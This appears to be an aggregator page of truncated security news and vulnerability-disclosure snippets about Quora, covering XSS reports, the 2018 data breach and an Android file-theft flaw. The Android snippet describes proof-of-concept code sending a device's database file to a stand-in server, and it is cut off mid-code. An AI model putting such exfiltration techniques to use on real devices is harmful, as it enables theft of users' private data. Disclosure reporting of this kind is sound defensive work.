quora.com Cross Site Scripting vulnerability OBB-4040355

Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently hidde...

EastWind Attack Deploys PlugY and GrewApacha Backdoors Using Booby-Trapped LNK Files

The Russian government and IT organizations are the target of a new campaign that delivers a number of backdoors and trojans as part of a spear-phishing campaign codenamed EastWind. The attack chains are characterized by the use of RAR archive attachments containing a Windows shortcut LNK file...

Quora’s Chatbot Platform Poe Allows Users to Download Paywalled Articles on Demand

WIRED was able to download stories from publishers like The New York Times and The Atlantic using Poe’s Assistant bot. One expert calls it “prima facie copyright infringement,” which Quora disputes...

seomarketing-fitness.quora.com Cross Site Scripting vulnerability OBB-2914505

Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently hidde...

ourkitchen1sink1.quora.com Cross Site Scripting vulnerability OBB-2895985

Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently hidde...

blacktothepink.quora.com Cross Site Scripting vulnerability OBB-2880094

Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently hidde...

radicalambedkarites.quora.com Cross Site Scripting vulnerability OBB-2868303

Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently hidde...

allskilltech.quora.com Cross Site Scripting vulnerability OBB-2868054

Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently hidde...

Twifo-Cli - Get User Information Of A Twitter User

Get user information of a Twitter user! Install $ npm install --global twifo-cli OR $ sudo npm install --global twifo-cli Usage $ Usage: twifo Example: $ twifo 9gag Related twifo : API for this tool. quorafy: Get user information of a Quora user. Download Twifo-Cli...

The Worst Hacks of 2018: Marriott, Atlanta, Quora, and More

From the Marriott and Facebook meltdowns to state-sponsored assaults, 2018 was an eventful year for cybercrime...

Quora Hacked, Moscow Ransomware, and More Security News This Week

China accusations, Eastern European bank heists, and more of the week's top security news...

This Week in Security News: Security and Privacy Issues

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, understand how Trend Micro Deep Security service will be integrating with AWS Security Hub. Also, learn how to prevent risks and secure...

Quora Breach Exposes a Wealth of Info on 100M Users

Crowdsourced query site Quora is asking the question of “what happened?” in the wake of a massive data breach that impacts up to 100 million of its users. The hack exposed user names, email addresses, hashed passwords, direct message content and imported data from any networks that users linked t...

Quora hacked: Personal data of 100 million users stolen

By Waqas Quora hacked - Change your password now. Another day, another data breach - This time Quora, a question-and-answer website, has suffered a massive data breach in which personal data of 100 million registered users has been stolen, the company said on Tuesday, December 4th. In a blog post...

Quora Gets Hacked – 100 Million Users Data Stolen

The World's most popular question-and-answer website Quora has suffered a massive data breach with unknown hackers gaining unauthorized access to potentially sensitive personal information of about 100 million of its users. Quora announced the incident late Monday after its team last Friday...

Quora Gets Hacked – 100 Million Users Data Stolen

The World's most popular question-and-answer website Quora has suffered a massive data breach with unknown hackers gaining unauthorized access to potentially sensitive personal information of about 100 million of its users. Quora announced the incident late Monday after its team last Friday...

Quora: IDNs displayed in unicode

Hello Quora, Please refer https://en.wikipedia.org/wiki/Internationalizeddomainname to know more about IDNs. The IDN Internationalized Domain Name : http://ebаy.com/ is a homograph for the latin ebay.com. if you click that first link, you might think that you are going to ebay.com but in fact, yo...

Quora: XSS through `__e2e_action_id` delivered by JSONP

Summary: The e2eactionid params used with POST requests to /servercallPOST?m= endpoint is not properly escaped when reflected back on a response allowing to inject Javascript. Also, another issue on some methods such as /servercallPOST?m=edit allows - with a strong premise discussed on the...

Quora: XSS when clicking "Share to Twitter" at quora.com/widgets/embed_iframe?path=...

Summary: The endpoint at https://language.quora.com/widgets/embediframe?path=pathtoanswerinsamelanguage shows the answer you specify in path like /Question/answer/User in a format useful to embed. There is one button Share that when clicked shows another button Share to Twitter. The href attribut...

Quora: [Quora Android] Possible to steal arbitrary files from mobile device

Summary: Service xml enabled and exported. If it's exported, it means that any third party application can access it and send arbitrary data into it. The following code sends main database file to arbitrary server I used http://google.com/zaheck: java UploadTaskParameters params = new...